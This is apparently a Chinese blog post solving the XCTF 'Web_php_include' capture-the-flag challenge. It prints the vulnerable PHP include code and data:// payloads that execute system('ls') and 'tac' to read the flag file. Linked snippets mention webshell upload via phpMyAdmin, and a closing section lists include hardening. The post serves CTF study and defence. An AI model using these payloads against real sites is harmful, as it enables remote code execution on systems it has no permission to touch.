攻防世界web高阶(web_php_include)

最新推荐文章于 2025-09-30 10:00:00 发布
原创 最新推荐文章于 2025-09-30 10:00:00 发布 · 738 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文介绍了一种利用文件包含漏洞的技术,通过构造特定payload,即使在cat、tail等命令无法直接显示文件内容的情况下,也能使用tac命令从尾到头反向输出文件,从而读取目标文件的内容。

payload:不过滤大小写,让page=php://
?page=data:text/plain,<?php system("ls") ?>
?page=data:text/plain,<?php system("tac fl4gisisish3r3.php") ?>
data伪协议

本例特殊之处在于: 知道文件, 但是 调用 cat、tail、 less、more 并不能显示文件内容,但是 有一个命令 tac:将文件全部内容从尾到头反向连续输出到标准输出(屏幕)上
通过代码知道是文件包含漏洞
https://blog.youkuaiyun.com/Vansnc/article/details/82528395(漏洞分析的网址)

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];		/$page变量等于网页获取到的page)
while (strstr($page, "php://")) {		/(判断php://是否出现在page变量中,这个函数对大小写敏感)
    $page=str_replace("php://", "", $page);		/(把$page变量中的php://替换成空格,“”就是空格)
}
include($page);
?>

payload:?page=data:text/plain,<?php system("ls");?>	看文件目录
	?page=data:text/plain,<?php system("文件名字");?>	f12源码里有flag
攻防世界(web)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 4078
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
热门推荐
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1492
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界-web-Web_php_include
wuh2333的博客
05-18 308
攻防世界php_web_include
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 607
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界web进阶区——Web_php_include
一枚菜鸡
10-18 652
一、基本方法:大小写绕过 考察的是文件包含,page中带有php://的都会被替换成空,str_replace()以其他字符替换字符串中的一些字符(区分大小写),strstr() 查找字符串首次出现的位置。返回字符串剩余部分。 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", ""
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 5313
ctf学习记录
攻防世界25-Web_python_template_injection-CTFWeb
LH1013886337的博客
10-16 927
首先,题目告诉我们这是一个 python 注入问题,思考怎样用 python 语句获取控制台权限:想到了。包裹的内容当做变量解析替换,所以当我们传入。python模板注入,其实就是ssti,举例,Jinja2 在渲染的时候会把。,这下我们就可以随便用控制台输出了。, 我们想要的是内容,所所以选择。类,它在列表的第七十二位, 即。时,表达式就会被渲染器执行。从其中可以找到我们想要 的。), 这两句前者返回。
攻防世界-Web-Web_php_include
最新发布
2301_80797059的博客
09-30 356
1.php伪协议及大小写绕过2.data伪协议php代码执行3.data伪协议传木马4.phpmyadmin写木马。
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3470
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.youkuaiyun.com/qq_36374896/arti...
攻防世界18-Web_php_include-CTFWeb进阶
LH1013886337的博客
10-13 486
看名字可能是文件包含的题和。
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 2683
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
XCTF-攻防世界CTF平台-Web类——4、Web_php_includephp中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 3836
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
攻防世界XCTF:Web_php_include
末初 · mochu7
03-13 1077
这里需要绕过strstr()函数查找字符,使用php伪协议,不然会被替换为空。 针对strstr()函数对大小写敏感,绕过使用php://input流 也就是说,如果使用php://input 我们传入的数据就能相当于以post包的形式,传入php变量执行。 Cat fl4gisisish3r3.php查看内容 ...
【XCTF 攻防世界WEB 高手进阶区 Web_php_include
weixin_45844670的博客
08-23 2005
目录基础题解本题相关知识点:一题多解:**php文件包含****一句话木马****data://伪协议**data://伪协议+一句话木马 基础题解 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 上面这段
青少年CTF-qsnctf-Web-include01&include02(多种方法-知识点较多-建议收藏!)
m0_73734159的博客
12-23 2216
php://data协议是PHP中的一种特殊协议,可以在包含函数中被用来执行一些特殊的操作。它没有条件限制,但仅能用于在CTF(Capture The Flag)中读取本地文件,且不受allow_url_fopen与allow_url_include的影响。php://input是PHP提供的一个伪协议,允许开发者访问POST请求的原始内容。因为根目录下只有flag这一个f开头的文件 所以查看的就是flag文件的内容咯。题目描述:你能否获取Flag呢,flag格式为:qsnctf{xxx}。
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 6469
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
ctfshow php特性系列
xiaolong22333的博客
04-18 5190
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
ctf任意文件包含漏洞简单讲解含php伪协议及习题
qq_59950255的博客
11-26 2390
先来看看什么是文件包含 在开发的过程中,遇到一些需要经常重复使用的代码,如果每次都重新写入,会造成很大的麻烦,所以,我们会将这些需要大量使用的重复代码写入一个文件中,在项目中通过函数引入这个文件,那么就可以做到代码的插入。 这些代码由几个函数引入 1.include()函数 include()函数,是临时加载的,在读到该函数时,才会包含里面的文件。include()在执行的时候如果: "合法代码" include('XXXX')假如include读取的文件不存在,他的上下两个"合法代码"都会执..
攻防世界Web_php_include
12-27
### 关于Web安全中PHP `include`相关的攻击与防御 #### PHP Include 攻击原理 当应用程序使用用户提供的输入直接包含文件时,可能会发生文件包含漏洞。如果未对用户提交的数据进行适当验证,则可能导致远程文件包含(RFI)或本地文件包含(LFI)[^2]。 #### 防御措施 ##### 输入验证 确保所有来自用户的输入都经过严格过滤和消毒处理。不允许任何不受信任的数据作为文件路径的一部分传递给`include`语句。可以采用白名单机制来限定允许访问的具体文件列表: ```php $allowed_files = ['file1.php', 'file2.php']; $file_to_include = $_GET['page']; if(in_array($file_to_include, $allowed_files)){ include $file_to_include; }else{ echo "Invalid file requested."; } ``` ##### 文件扩展名检查 强制规定只允许特定类型的文件被包含进来,并且最好是在服务器端设置默认的`.php`扩展名以避免绕过防护逻辑的情况出现: ```php // 只允许 .php 扩展名的文件 if(pathinfo($filename, PATHINFO_EXTENSION) !== 'php'){ die('Invalid extension'); } include "$filename.php"; ``` ##### 禁止URL传参方式调用 尽可能地避免通过HTTP请求参数指定要加载的内容;而是考虑使用固定名称或者枚举值映射到内部资源上。这样即使存在潜在风险也能有效遏制住外部干扰源的影响范围。 ##### 使用绝对路径而非相对路径 始终使用完整的、基于根目录下的绝对路径而不是当前工作目录内的相对位置去引用待引入的目标文档。这有助于减少因环境变量配置不当而引发的安全隐患。 ```php define('__ROOT__', dirname(__FILE__)); include __ROOT__."/path/to/file.php"; // 绝对路径更安全 ``` ##### 开启open_basedir限制 在PHP.ini配置文件里启用此选项可进一步约束脚本所能触及的最大边界之外的一切尝试都将失败返回错误提示信息。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值